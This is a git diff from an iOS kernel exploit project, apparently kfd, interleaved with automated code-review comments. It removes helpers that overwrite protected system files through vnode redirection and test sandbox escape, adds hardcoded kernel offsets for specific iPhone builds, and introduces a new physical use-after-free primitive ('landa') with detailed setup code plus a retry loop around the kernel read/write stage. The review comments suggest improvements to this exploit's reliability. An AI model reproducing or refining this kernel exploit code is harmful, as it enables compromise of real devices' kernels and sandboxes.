- for(NSString *dir in dirs) {
- NSString *path = [NSString stringWithFormat:@"%@/%@", mntPath, dir];
- [[NSFileManager defaultManager] removeItemAtPath:path error:nil];
- }
-
- dirs = [[NSFileManager defaultManager] contentsOfDirectoryAtPath:mntPath error:NULL];
- NSLog(@"/var/mobile/Library/Caches/com.apple.keyboards/images directory list:\n %@", dirs);
-
- UnRedirectAndRemoveFolder(orig_to_v_data, mntPath);
-
- return 0;
-}
-
-#define COUNTRY_KEY @"h63QSdBCiT/z0WU6rdQv6Q"
-#define REGION_KEY @"zHeENZu+wbg7PUprwNwBWg"
-int regionChanger(NSString *country_value, NSString *region_value) {
- NSString *plistPath = @"/var/containers/Shared/SystemGroup/systemgroup.com.apple.mobilegestaltcache/Library/Caches/com.apple.MobileGestalt.plist";
- NSString *rewrittenPlistPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/com.apple.MobileGestalt.plist"];
-
- remove(rewrittenPlistPath.UTF8String);
-
- NSDictionary *dict1 = [NSDictionary dictionaryWithContentsOfFile:plistPath];
- NSMutableDictionary *mdict1 = dict1 ? [dict1 mutableCopy] : [NSMutableDictionary dictionary];
- NSDictionary *dict2 = dict1[@"CacheExtra"];
-
- NSMutableDictionary *mdict2 = dict2 ? [dict2 mutableCopy] : [NSMutableDictionary dictionary];
- mdict2[COUNTRY_KEY] = country_value;
- mdict2[REGION_KEY] = region_value;
- [mdict1 setObject:mdict2 forKey:@"CacheExtra"];
-
- NSData *binaryData = [NSPropertyListSerialization dataWithPropertyList:mdict1 format:NSPropertyListBinaryFormat_v1_0 options:0 error:nil];
- [binaryData writeToFile:rewrittenPlistPath atomically:YES];
-
- funVnodeOverwrite2(plistPath.UTF8String, rewrittenPlistPath.UTF8String);
-
- return 0;
-}
-
-//NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"];
-//// /var/containers/Shared/SystemGroup/systemgroup.com.apple.configurationprofiles/Library/ConfigurationProfiles/CloudConfigurationDetails.plist
-//
-//uint64_t systemgroup_vnode = getVnodeSystemGroup();
-//
-////must enter 3 subdirectories
-//uint64_t configurationprofiles_vnode = findChildVnodeByVnode(systemgroup_vnode, "systemgroup.com.apple.configurationprofiles");
-//while(1) {
-// if(configurationprofiles_vnode != 0)
-// break;
-// configurationprofiles_vnode = findChildVnodeByVnode(systemgroup_vnode, "systemgroup.com.apple.configurationprofiles");
-//}
-//printf("[i] /var/containers/Shared/SystemGroup/systemgroup.com.apple.configurationprofiles vnode: 0x%llx\n", configurationprofiles_vnode);
-
-
-void HexDump(uint64_t addr, size_t size) {
- void *data = malloc(size);
- kreadbuf(addr, data, size);
- char ascii[17];
- size_t i, j;
- ascii[16] = '\0';
- for (i = 0; i < size; ++i) {
- if ((i % 16) == 0)
- {
- printf("[0x%016llx+0x%03zx] ", addr, i);
-// printf("[0x%016llx] ", i + addr);
- }
-
- printf("%02X ", ((unsigned char*)data)[i]);
- if (((unsigned char*)data)[i] >= ' ' && ((unsigned char*)data)[i] <= '~') {
- ascii[i % 16] = ((unsigned char*)data)[i];
- } else {
- ascii[i % 16] = '.';
- }
- if ((i+1) % 8 == 0 || i+1 == size) {
- printf(" ");
- if ((i+1) % 16 == 0) {
- printf("| %s \n", ascii);
- } else if (i+1 == size) {
- ascii[(i+1) % 16] = '\0';
- if ((i+1) % 16 <= 8) {
- printf(" ");
- }
- for (j = (i+1) % 16; j < 16; ++j) {
- printf(" ");
- }
- printf("| %s \n", ascii);
- }
- }
- }
- free(data);
-}
-
-bool sandbox_escape_can_i_access_file(char* path, int mode) {
- NSString *mntPath = [NSString stringWithFormat:@"%@%@", NSHomeDirectory(), @"/Documents/mounted"];
- uint64_t vnode = getVnodeAtPathByChdir([[NSString stringWithUTF8String:path] stringByDeletingLastPathComponent].UTF8String);
- uint64_t orig_to_v_data = createFolderAndRedirect(vnode, mntPath);
-
- NSString *mountedPath = [NSString stringWithFormat:@"%@/%@", mntPath, [[NSString stringWithUTF8String:path] lastPathComponent]];
-
- bool ret = false;
-
- if(access(mountedPath.UTF8String, mode) == 0) {
- ret = true;
- }
-
- UnRedirectAndRemoveFolder(orig_to_v_data, mntPath);
-
- return ret;
-}
diff --git a/kfd/kfd-Bridging-Header.h b/kfd/kfd-Bridging-Header.h
index 20f29a5f..52309c17 100644
--- a/kfd/kfd-Bridging-Header.h
+++ b/kfd/kfd-Bridging-Header.h
@@ -2,13 +2,5 @@ * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. */ -#include "fun/fun.h" -#include "fun/krw.h" -#include "fun/thanks_opa334dev_htrowii.h" -#include "fun/vnode.h" -#include "fun/helpers.h" -#include "KFD-manager.h" -//#include "filemanager_by_akusio/ViewController.h" -//#include "filemanager_by_akusio/AXFileViewController.h" -#include "../MiniRootFileManager15/filemanager_by_akusio/ViewController.h" -#include "../MiniRootFileManager15/filemanager_by_akusio/AXFileViewController.h" +#include "overwrite/fun.h" +#include "overwrite/krw.h"
diff --git a/kfd/libkfd.h b/kfd/libkfd.h
index c1d48853..b54841da 100644
--- a/kfd/libkfd.h
+++ b/kfd/libkfd.h
@@ -13,7 +13,6 @@ #define CONFIG_TIMER 1 #include "libkfd/common.h" -#include "fun.h" /* * The public API of libkfd.
@@ -22,6 +21,7 @@ enum puaf_method { puaf_physpuppet, puaf_smith, + puaf_landa, }; enum kread_method {
@@ -55,6 +55,7 @@ struct info { i32 pid; u64 tid; u64 vid; + u64 exploit_type; u64 maxfilesperproc; char kern_version[512]; } env;
@@ -151,6 +152,8 @@ struct kfd { struct kfd* kfd_init(u64 puaf_pages, u64 puaf_method, u64 kread_method, u64 kwrite_method) { struct kfd* kfd = (struct kfd*)(malloc_bzero(sizeof(struct kfd))); + kfd->info.env.exploit_type = puaf_method; + info_init(kfd); puaf_init(kfd, puaf_pages, puaf_method); krkw_init(kfd, kread_method, kwrite_method); @@ -170,18 +173,33 @@ void kfd_free(struct kfd* kfd) u64 kopen(u64 puaf_pages, u64 puaf_method, u64 kread_method, u64 kwrite_method) { timer_start(); + + bool fail = false; const u64 puaf_pages_min = 16; const u64 puaf_pages_max = 2048; assert(puaf_pages >= puaf_pages_min); assert(puaf_pages <= puaf_pages_max); - assert(puaf_method <= puaf_smith); + assert(puaf_method <= puaf_landa); assert(kread_method <= kread_sem_open); assert(kwrite_method <= kwrite_sem_open); struct kfd* kfd = kfd_init(puaf_pages, puaf_method, kread_method, kwrite_method); + +retry: puaf_run(kfd); - krkw_run(kfd); + fail = krkw_run(kfd); + if(fail && (kfd->info.env.exploit_type == 2)) { + puaf_free(kfd); + info_free(kfd); + bzero(kfd, sizeof(struct kfd)); + info_init(kfd); + puaf_init(kfd, puaf_pages, puaf_method); + krkw_init(kfd, kread_method, kwrite_method); + perf_init(kfd); + goto retry; + } + info_run(kfd); perf_run(kfd); puaf_cleanup(kfd); diff --git a/kfd/libkfd/1.png b/kfd/libkfd/1.png deleted file mode 100644 index 741cbc25..00000000 Binary files a/kfd/libkfd/1.png and /dev/null differ diff --git a/kfd/libkfd/2.png b/kfd/libkfd/2.png deleted file mode 100644 index 8e55158e..00000000 Binary files a/kfd/libkfd/2.png and /dev/null differ diff --git a/kfd/libkfd/3.png b/kfd/libkfd/3.png deleted file mode 100644 index c7650eec..00000000 Binary files a/kfd/libkfd/3.png and /dev/null differ diff --git a/kfd/libkfd/4.png b/kfd/libkfd/4.png deleted file mode 100644 index e6d9ae0a..00000000 Binary files a/kfd/libkfd/4.png and /dev/null differ 
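Review bot: The `goto retry` path added to kopen has no attempt limit, so if `krkw_run` keeps returning true the function never returns; a counter checked in the retry condition would bound it. The condition tests `kfd->info.env.exploit_type == 2`, which matches `puaf_landa` only because of where that enumerator sits in `enum puaf_method`, so `== puaf_landa` would say what is meant. The retry block also repeats the init calls from kfd_init after `bzero(kfd, sizeof(struct kfd))` but not the `kfd->info.env.exploit_type = puaf_method;` assignment, so unless info_init sets that field (not visible in this diff) the two paths have drifted apart; sharing one helper between kfd_init and the retry would keep them in step. kopen continues past the end of this hunk.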
diff --git a/kfd/libkfd/5.png b/kfd/libkfd/5.png deleted file mode 100644 index 3181e495..00000000 Binary files a/kfd/libkfd/5.png and /dev/null differ diff --git a/kfd/libkfd/6.png b/kfd/libkfd/6.png deleted file mode 100644 index 43b30d7f..00000000 Binary files a/kfd/libkfd/6.png and /dev/null differ diff --git a/kfd/libkfd/7.png b/kfd/libkfd/7.png deleted file mode 100644 index ed428bc6..00000000 Binary files a/kfd/libkfd/7.png and /dev/null differ diff --git a/kfd/libkfd/8.png b/kfd/libkfd/8.png deleted file mode 100644 index 56f789ba..00000000 Binary files a/kfd/libkfd/8.png and /dev/null differ diff --git a/kfd/libkfd/9.png b/kfd/libkfd/9.png deleted file mode 100644 index d9e959dc..00000000 Binary files a/kfd/libkfd/9.png and /dev/null differ diff --git a/kfd/libkfd/AAAA.bin b/kfd/libkfd/AAAA.bin deleted file mode 100644 index a3abe55e..00000000 --- a/kfd/libkfd/AAAA.bin +++ /dev/null @@ -1 +0,0 @@ -PLZ_GIVE_ME_GIRLFRIENDS_!@# diff --git a/kfd/libkfd/PlampyWifi.car b/kfd/libkfd/PlampyWifi.car deleted file mode 100644 index e56a15fc..00000000 Binary files a/kfd/libkfd/PlampyWifi.car and /dev/null differ diff --git a/kfd/libkfd/SFUI.ttf b/kfd/libkfd/SFUI.ttf deleted file mode 100644 index cf058245..00000000 Binary files a/kfd/libkfd/SFUI.ttf and /dev/null differ diff --git a/kfd/libkfd/cert.pem b/kfd/libkfd/cert.pem deleted file mode 100644 index 60213467..00000000 --- a/kfd/libkfd/cert.pem +++ /dev/null 
@@ -1,18 +0,0 @@ ------BEGIN CERTIFICATE----- -MIIC7jCCAlegAwIBAgIBATANBgkqhkiG9w0BAQsFADBWMQswCQYDVQQGEwJDQTEL -MAkGA1UECAwCQkMxGjAYBgNVBAoMEVdvcnRoIERvaW5nIEJhZGx5MR4wHAYDVQQD -DBVXb3J0aCBEb2luZyBCYWRseSBEREkwHhcNMDcwNDE2MjI1NTMxWhcNMTQwNDE2 -MjI1NTMxWjBWMQswCQYDVQQGEwJDQTELMAkGA1UECAwCQkMxGjAYBgNVBAoMEVdv -cnRoIERvaW5nIEJhZGx5MR4wHAYDVQQDDBVXb3J0aCBEb2luZyBCYWRseSBEREkw -gZ8wDQYJKoZIhvcNAQEBBQADgY0AMIGJAoGBAJ75L8F15PbuExawBDsGKMuLCeN9 -XV7aY+7ZcynhfUl/YPEOh3/MkHdqDJv8u6Kphq3UASJbz9rWSvI0Ggi1awC/Fo0r -d0NZTZ1X4JYwpoFoynhbYRZPCV8AX+4GAkCilNRZkSdXJ9Y8vTzgaa2vZl709n9R -DTVOtWgLPK/PfxoFAgMBAAGjgcswgcgwLAYJYIZIAYb4QgENBB8WHU9wZW5TU0wg -R2VuZXJhdGVkIENlcnRpZmljYXRlMB0GA1UdDgQWBBR4cwAYnonzvzDa2Psd3pob -7eGOJTBoBgNVHSMEYTBfoVqkWDBWMQswCQYDVQQGEwJDQTELMAkGA1UECAwCQkMx -GjAYBgNVBAoMEVdvcnRoIERvaW5nIEJhZGx5MR4wHAYDVQQDDBVXb3J0aCBEb2lu -ZyBCYWRseSBEREmCAQEwDwYDVR0TAQH/BAUwAwEB/zANBgkqhkiG9w0BAQsFAAOB -gQAtCSlLUVRSFE7McKLrqbDULZnv2NhYQA7bcVbykL15/ki5J89v7OVx2+sXdks5 -4eRrn8ur84TR+6iPUe0g3cJ4fmRjfOHUAfCa0qBvJsUViRXgIa9+PaXFIQFy7yy6 -mREglQGCLcO3s100NCcybJC8ufmlzovNkjIRdS4RPSwyRA== ------END CERTIFICATE----- diff --git a/kfd/libkfd/focusmain.caml b/kfd/libkfd/focusmain.caml deleted file mode 100644 index 9ba7cefa..00000000 --- a/kfd/libkfd/focusmain.caml +++ /dev/null @@ -1,35 +0,0 @@ - - - - - - - - - - - - - - - - - diff --git a/kfd/libkfd/info/dynamic_info.h b/kfd/libkfd/info/dynamic_info.h index 503b0ea8..25cb29ac 100644 --- a/kfd/libkfd/info/dynamic_info.h +++ b/kfd/libkfd/info/dynamic_info.h 
@@ -104,6 +104,87 @@ struct dynamic_info { }; const struct dynamic_info kern_versions[] = { + //iPhone 13 mini 16.5.1 + { + .kern_version = "Darwin Kernel Version 22.5.0: Thu Jun 8 17:14:33 PDT 2023; root:xnu-8796.122.5~1/RELEASE_ARM64_T8110", + .fileglob__fg_ops = 0x28, + .fileglob__fg_data = 0x40 - 8, + .fileops__fo_kqfilter = 0x30, + // .fileproc__fp_iocount = 0x0000, + // .fileproc__fp_vflags = 0x0004, + // .fileproc__fp_flags = 0x0008, + // .fileproc__fp_guard_attrs = 0x000a, + // .fileproc__fp_glob = 0x0010, + // .fileproc__fp_guard = 0x0018, + // .fileproc__object_size = 0x0020, + .fileproc_guard__fpg_guard = 0x8, + .kqworkloop__kqwl_state = 0x10, + .kqworkloop__kqwl_p = 0x18, + .kqworkloop__kqwl_owner = 0xd0, + .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, + .kqworkloop__object_size = 0x108, + .pmap__tte = 0x0, + .pmap__ttep = 0x8, + .proc__p_list__le_next = 0x0, + .proc__p_list__le_prev = 0x8, + .proc__p_pid = 0x60, + .proc__p_fd__fd_ofiles = 0xf8, + .proc__object_size = 0x730, + .pseminfo__psem_usecount = 0x04, + .pseminfo__psem_uid = 0x0c, + .pseminfo__psem_gid = 0x10, + .pseminfo__psem_name = 0x14, + .pseminfo__psem_semobject = 0x38, + // .psemnode__pinfo = 0x0000, + // .psemnode__padding = 0x0008, + // .psemnode__object_size = 0x0010, + .semaphore__owner = 0x28, + .specinfo__si_rdev = 0x18, + .task__map = 0x28, + .task__threads__next = 0x80 - 0x28, + .task__threads__prev = 0x80 - 0x28 + 8, + .task__itk_space = 0x300, + .task__object_size = 0x640, + .thread__task_threads__next = 0x380 - 0x18, + .thread__task_threads__prev = 0x380 - 0x18 + 8, + .thread__map = 0x380, + .thread__thread_id = 0x418, + .thread__object_size = 0x4c0, + .uthread__object_size = 0x200, + .vm_map_entry__links__prev = 0x00, + .vm_map_entry__links__next = 0x08, + .vm_map_entry__links__start = 0x10, + .vm_map_entry__links__end = 0x18, + .vm_map_entry__store__entry__rbe_left = 0x20, + .vm_map_entry__store__entry__rbe_right = 0x28, + .vm_map_entry__store__entry__rbe_parent = 0x30, + 
.vnode__v_un__vu_specinfo = 0x78, + ._vm_map__hdr__links__prev = 0x00 + 0x8, + ._vm_map__hdr__links__next = 0x08 + 0x8, + ._vm_map__hdr__links__start = 0x10 + 0x8, + ._vm_map__hdr__links__end = 0x18 + 0x8, + ._vm_map__hdr__nentries = 0x30, + ._vm_map__hdr__rb_head_store__rbh_root = 0x38, + ._vm_map__pmap = 0x40, + ._vm_map__hint = 0x90 + 0x08, + ._vm_map__hole_hint = 0x90 + 0x10, + ._vm_map__holes_list = 0x90 + 0x18, + ._vm_map__object_size = 0xc0, + .kernelcache__kernel_base = 0xfffffff007004000, + .kernelcache__cdevsw = 0xfffffff00a471208, + .kernelcache__gPhysBase = 0xfffffff00793c1a0, + .kernelcache__gPhysSize = 0xfffffff00793c1a0 + 8, + .kernelcache__gVirtBase = 0xfffffff00793a378, + .kernelcache__perfmon_devices = 0xfffffff00a4af520, + .kernelcache__perfmon_dev_open = 0xfffffff007efd570, + .kernelcache__ptov_table = 0xfffffff0078ef180, + .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4ae990, + .kernelcache__vm_pages = 0xfffffff0078ebec0, + .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ee130, + .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4ae988, + .kernelcache__vn_kqfilter = 0xfffffff007f4a0d8, + }, + //iPhone 12 mini 16.1.2 { .kern_version = "Darwin Kernel Version 22.1.0: Thu Oct 6 19:34:22 PDT 2022; root:xnu-8792.42.7~1/RELEASE_ARM64_T8101", 
@@ -172,12 +253,12 @@ const struct dynamic_info kern_versions[] = { ._vm_map__object_size = 0x00c0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3a1168, - .kernelcache__gPhysBase = 0xfffffff007847e40, - .kernelcache__gPhysSize = 0xfffffff007847e48, - .kernelcache__gVirtBase = 0xfffffff007846028, + .kernelcache__gPhysBase = 0xfffffff007847e40, //ok + .kernelcache__gPhysSize = 0xfffffff007847e48, //ok + .kernelcache__gVirtBase = 0xfffffff007846028, //ok .kernelcache__perfmon_devices = 0xfffffff00a3dc330, .kernelcache__perfmon_dev_open = 0xfffffff007ecb5d0, - .kernelcache__ptov_table = 0xfffffff0077fb9c0, + .kernelcache__ptov_table = 0xfffffff0077fb9c0, //ok .kernelcache__vm_first_phys_ppnum = 0xfffffff00a3db780, .kernelcache__vm_pages = 0xfffffff0077f86d8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0077fa970, @@ -252,12 +333,12 @@ const struct dynamic_info kern_versions[] = { ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a47dab0, - .kernelcache__gPhysBase = 0xfffffff0079541b8, - .kernelcache__gPhysSize = 0xfffffff0079541b8 + 8, - .kernelcache__gVirtBase = 0xfffffff007952370, + .kernelcache__gPhysBase = 0xfffffff0079541b8, //ok + .kernelcache__gPhysSize = 0xfffffff0079541c0, //ok + .kernelcache__gVirtBase = 0xfffffff007952370, //ok .kernelcache__perfmon_devices = 0xfffffff00a4bd520, .kernelcache__perfmon_dev_open = 0xfffffff007f07d78, - .kernelcache__ptov_table = 0xfffffff0079079b8, + .kernelcache__ptov_table = 0xfffffff0079079b8, //no .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4bc910, .kernelcache__vm_pages = 0xfffffff007904100, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007906958, diff --git a/kfd/libkfd/ios16.car b/kfd/libkfd/ios16.car deleted file mode 100644 index c82a8246..00000000 Binary files a/kfd/libkfd/ios16.car and /dev/null differ diff --git a/kfd/libkfd/krkw.h b/kfd/libkfd/krkw.h index 99522059..b4811444 100644 
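Review bot: The trailing `//ok` and `//no` markers added to the `kernelcache__*` initialisers are not explained anywhere in these hunks, and `.kernelcache__ptov_table = 0xfffffff0079079b8, //no` leaves a value in the table that the author's own marker appears to flag as wrong. A reader cannot tell whether the marker means unverified, known-bad or unused, so it should be spelled out, for example `// NOTE: not confirmed for this build` if that is the meaning. The last hunk also rewrites `0xfffffff0079541b8 + 8` as `0xfffffff0079541c0`, while the entry added in the first hunk of this file still uses the `base + 8` form for `kernelcache__gPhysSize`; one convention across the table would make the entries easier to compare.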
--- a/kfd/libkfd/krkw.h +++ b/kfd/libkfd/krkw.h @@ -33,7 +33,7 @@ // Forward declarations for helper functions. void krkw_helper_init(struct kfd* kfd, struct krkw* krkw); -void krkw_helper_grab_free_pages(struct kfd* kfd); +bool krkw_helper_grab_free_pages(struct kfd* kfd); void krkw_helper_run_allocate(struct kfd* kfd, struct krkw* krkw); void krkw_helper_run_deallocate(struct kfd* kfd, struct krkw* krkw); void krkw_helper_free(struct kfd* kfd, struct krkw* krkw); @@ -84,9 +84,10 @@ void krkw_init(struct kfd* kfd, u64 kread_method, u64 kwrite_method) krkw_helper_init(kfd, &kfd->kwrite); } -void krkw_run(struct kfd* kfd) +bool krkw_run(struct kfd* kfd) { - krkw_helper_grab_free_pages(kfd); + if(krkw_helper_grab_free_pages(kfd)) + return true; timer_start(); krkw_helper_run_allocate(kfd, &kfd->kread); @@ -94,6 +95,7 @@ void krkw_run(struct kfd* kfd) krkw_helper_run_deallocate(kfd, &kfd->kread); krkw_helper_run_deallocate(kfd, &kfd->kwrite); timer_end(); + return false; } void krkw_kread(struct kfd* kfd, u64 kaddr, void* uaddr, u64 size) @@ -121,13 +123,15 @@ void krkw_helper_init(struct kfd* kfd, struct krkw* krkw) krkw->krkw_method_ops.init(kfd); } -void krkw_helper_grab_free_pages(struct kfd* kfd) +bool krkw_helper_grab_free_pages(struct kfd* kfd) { timer_start(); const u64 copy_pages = (kfd->info.copy.size / pages(1)); const u64 grabbed_puaf_pages_goal = (kfd->puaf.number_of_puaf_pages / 4); - const u64 grabbed_free_pages_max = 400000; + u64 grabbed_free_pages_max = 400000; + if(kfd->info.env.exploit_type == 2) + grabbed_free_pages_max = 40000; for (u64 grabbed_free_pages = copy_pages; grabbed_free_pages < grabbed_free_pages_max; grabbed_free_pages += copy_pages) { assert_mach(vm_copy(mach_task_self(), kfd->info.copy.src_uaddr, kfd->info.copy.size, kfd->info.copy.dst_uaddr)); 
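Review bot: `krkw_run` and `krkw_helper_grab_free_pages` now return `bool` with `true` meaning failure, and neither the prototype nor the definitions say so; that is the opposite of the usual `bool` success convention and easy to misread at the call site in kopen. A one-line comment on the prototype, e.g. `// returns true when the free-page goal was not reached`, would document it (the `return true;` after `print_warning` is in the next hunk of this file). In `krkw_helper_grab_free_pages` the test `kfd->info.env.exploit_type == 2` relies on the numeric value of `puaf_landa`, and the reason the cap drops from `400000` to `40000` is not stated; `== puaf_landa` plus a short why-comment would cover both.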
@@ -139,13 +143,14 @@ void krkw_helper_grab_free_pages(struct kfd* kfd) if (++grabbed_puaf_pages == grabbed_puaf_pages_goal) { print_u64(grabbed_free_pages); timer_end(); - return; + return false; } } } } print_warning("failed to grab free pages goal"); + return true; } void krkw_helper_run_allocate(struct kfd* kfd, struct krkw* krkw) diff --git a/kfd/libkfd/lock.caf b/kfd/libkfd/lock.caf deleted file mode 100644 index 4a784b02..00000000 Binary files a/kfd/libkfd/lock.caf and /dev/null differ diff --git a/kfd/libkfd/main.caml b/kfd/libkfd/main.caml deleted file mode 100644 index d089e977..00000000 --- a/kfd/libkfd/main.caml +++ /dev/null @@ -1,64 +0,0 @@ - - - - - diff --git a/kfd/libkfd/mainbluetooth.caml b/kfd/libkfd/mainbluetooth.caml deleted file mode 100644 index 71cce332..00000000 --- a/kfd/libkfd/mainbluetooth.caml +++ /dev/null @@ -1,26 +0,0 @@ - - - - - diff --git a/kfd/libkfd/mainbrightness.caml b/kfd/libkfd/mainbrightness.caml deleted file mode 100644 index 73a7c51b..00000000 --- a/kfd/libkfd/mainbrightness.caml +++ /dev/null @@ -1,46 +0,0 @@ - - - - - diff --git a/kfd/libkfd/mainforwardbackward.caml b/kfd/libkfd/mainforwardbackward.caml deleted file mode 100644 index 9b9eb248..00000000 --- a/kfd/libkfd/mainforwardbackward.caml +++ /dev/null @@ -1,50 +0,0 @@ - - - - - diff --git a/kfd/libkfd/mainplaypausestop.caml b/kfd/libkfd/mainplaypausestop.caml deleted file mode 100644 index 11412685..00000000 --- a/kfd/libkfd/mainplaypausestop.caml +++ /dev/null @@ -1,96 +0,0 @@ - - - - - diff --git a/kfd/libkfd/mainvolume.caml b/kfd/libkfd/mainvolume.caml deleted file mode 100644 index f3894048..00000000 --- a/kfd/libkfd/mainvolume.caml +++ /dev/null @@ -1,52 +0,0 @@ - - - - - diff --git a/kfd/libkfd/mainwifi.caml b/kfd/libkfd/mainwifi.caml deleted file mode 100644 index 74e1e962..00000000 --- a/kfd/libkfd/mainwifi.caml +++ /dev/null @@ -1,25 +0,0 @@ - - - - - 
diff --git a/kfd/libkfd/modules.materialrecipe b/kfd/libkfd/modules.materialrecipe deleted file mode 100644 index 56cbbd05..00000000 Binary files a/kfd/libkfd/modules.materialrecipe and /dev/null differ diff --git a/kfd/libkfd/modulesBackground.materialrecipe b/kfd/libkfd/modulesBackground.materialrecipe deleted file mode 100644 index 670aafe6..00000000 Binary files a/kfd/libkfd/modulesBackground.materialrecipe and /dev/null differ diff --git a/kfd/libkfd/other-0-+--white.png b/kfd/libkfd/other-0-+--white.png deleted file mode 100644 index 7516bfaf..00000000 Binary files a/kfd/libkfd/other-0-+--white.png and /dev/null differ diff --git a/kfd/libkfd/ps.log b/kfd/libkfd/ps.log deleted file mode 100644 index e69de29b..00000000 diff --git a/kfd/libkfd/puaf.h b/kfd/libkfd/puaf.h index 1bd41def..5bf6483a 100644 --- a/kfd/libkfd/puaf.h +++ b/kfd/libkfd/puaf.h @@ -10,6 +10,7 @@ void puaf_helper_get_vm_map_first_and_last(u64* first_out, u64* last_out); void puaf_helper_get_vm_map_min_and_max(u64* min_out, u64* max_out); void puaf_helper_give_ppl_pages(void); +#include "puaf/landa.h" #include "puaf/physpuppet.h" #include "puaf/smith.h" @@ -30,6 +31,7 @@ void puaf_init(struct kfd* kfd, u64 puaf_pages, u64 puaf_method) kfd->puaf.puaf_pages_uaddr = (u64*)(malloc_bzero(kfd->puaf.number_of_puaf_pages * sizeof(u64))); switch (puaf_method) { + puaf_method_case(landa) puaf_method_case(physpuppet) puaf_method_case(smith) } diff --git a/kfd/libkfd/puaf/landa.h b/kfd/libkfd/puaf/landa.h new file mode 100644 index 00000000..e4ac39f4 --- /dev/null +++ b/kfd/libkfd/puaf/landa.h 
@@ -0,0 +1,195 @@ +/* + * Copyright (c) 2023 Félix Poulin-Bélanger. All rights reserved. + */ + +#ifndef landa_h +#define landa_h + +const u64 landa_vme1_size = pages(1); +const u64 landa_vme2_size = pages(1); +const u64 landa_vme4_size = pages(1); + +// Forward declarations for helper functions. +void* landa_helper_spinner_pthread(void* arg); + +struct landa_data { + atomic_bool main_thread_returned; + atomic_bool spinner_thread_started; + vm_address_t copy_src_address; + vm_address_t copy_dst_address; + vm_size_t copy_size; +}; + +void landa_init(struct kfd* kfd) +{ + kfd->puaf.puaf_method_data_size = sizeof(struct landa_data); + kfd->puaf.puaf_method_data = malloc_bzero(kfd->puaf.puaf_method_data_size); +} + +void landa_run(struct kfd* kfd) +{ + struct landa_data* landa = (struct landa_data*)(kfd->puaf.puaf_method_data); + + /* + * Note: + * - The size of [src/dst]_vme_3 must be equal to pages(X), i.e. the desired PUAF size. + * - The copy_size must be greater than msg_ool_size_small (32 KiB), therefore it is + * sufficient for [src/dst]_vme_1 and [src/dst]_vme_2 to have a size of pages(1). + */ + u64 landa_vme3_size = pages(kfd->puaf.number_of_puaf_pages); + vm_size_t copy_size = landa_vme1_size + landa_vme2_size + landa_vme3_size; + landa->copy_size = copy_size; + + /* + * STEP 1A: + * + * Allocate the source VMEs and VMOs: + * - src_vme_1 has a size of pages(1) and owns the only reference to src_vmo_1. + * - src_vme_2 has a size of pages(1) and owns the only reference to src_vmo_2. + * - src_vme_3 has a size of pages(X) and owns the only reference to src_vmo_3. 
+ */ + vm_address_t src_address = 0; + vm_size_t src_size = copy_size; + assert_mach(vm_allocate(mach_task_self(), &src_address, src_size, VM_FLAGS_ANYWHERE | VM_FLAGS_RANDOM_ADDR)); + landa->copy_src_address = src_address; + + vm_address_t vme1_src_address = src_address; + vm_address_t vme2_src_address = vme1_src_address + landa_vme1_size; + vm_address_t vme3_src_address = vme2_src_address + landa_vme2_size; + assert_mach(vm_allocate(mach_task_self(), &vme1_src_address, landa_vme1_size, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_FLAGS_PURGABLE)); + assert_mach(vm_allocate(mach_task_self(), &vme2_src_address, landa_vme2_size, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_FLAGS_PURGABLE)); + assert_mach(vm_allocate(mach_task_self(), &vme3_src_address, landa_vme3_size, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_FLAGS_PURGABLE)); + + memset((void*)(src_address), 'A', copy_size); + + /* + * STEP 1B: + * + * Allocate the destination VMEs and VMOs: + * - dst_vme_1 has a size of pages(1) and owns the only reference to dst_vmo_1. + * dst_vme_1->user_wired_count == MAX_WIRE_COUNT, because of the mlock() for-loop. + * - dst_vme_2 has a size of pages(1) and owns the only reference to dst_vmo_2. + * dst_vme_2->is_shared == TRUE, because of the vm_remap() on itself. + * dst_vme_2->user_wired_count == 1, because of mlock(). + * - After the clip in vm_protect(), dst_vme_3 has a size of pages(X) and dst_vme_4 has a size of pages(1). + * dst_vme_3 and dst_vme_4 each have a reference to dst_vmo_3. 
+ */ + vm_address_t dst_address = 0; + vm_size_t dst_size = copy_size + landa_vme4_size; + assert_mach(vm_allocate(mach_task_self(), &dst_address, dst_size, VM_FLAGS_ANYWHERE | VM_FLAGS_RANDOM_ADDR)); + landa->copy_dst_address = dst_address; + + vm_address_t vme1_dst_address = dst_address; + vm_address_t vme2_dst_address = vme1_dst_address + landa_vme1_size; + vm_address_t vme3_dst_address = vme2_dst_address + landa_vme2_size; + vm_address_t vme4_dst_address = vme3_dst_address + landa_vme3_size; + vm_prot_t cur_protection = VM_PROT_DEFAULT; + vm_prot_t max_protection = VM_PROT_ALL; + assert_mach(vm_allocate(mach_task_self(), &vme1_dst_address, landa_vme1_size, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_FLAGS_PURGABLE)); + assert_mach(vm_allocate(mach_task_self(), &vme2_dst_address, landa_vme2_size, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_FLAGS_PURGABLE)); + assert_mach(vm_remap(mach_task_self(), &vme2_dst_address, landa_vme2_size, 0, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE, + mach_task_self(), vme2_dst_address, FALSE, &cur_protection, &max_protection, VM_INHERIT_DEFAULT)); + assert_mach(vm_allocate(mach_task_self(), &vme3_dst_address, landa_vme3_size + landa_vme4_size, VM_FLAGS_FIXED | VM_FLAGS_OVERWRITE | VM_FLAGS_PURGABLE)); + assert_mach(vm_protect(mach_task_self(), vme4_dst_address, landa_vme4_size, FALSE, VM_PROT_READ)); + + memset((void*)(dst_address), 'B', copy_size); + + for (u64 i = 0; i < UINT16_MAX; i++) { + assert_bsd(mlock((void*)(vme1_dst_address), landa_vme1_size)); + } + + 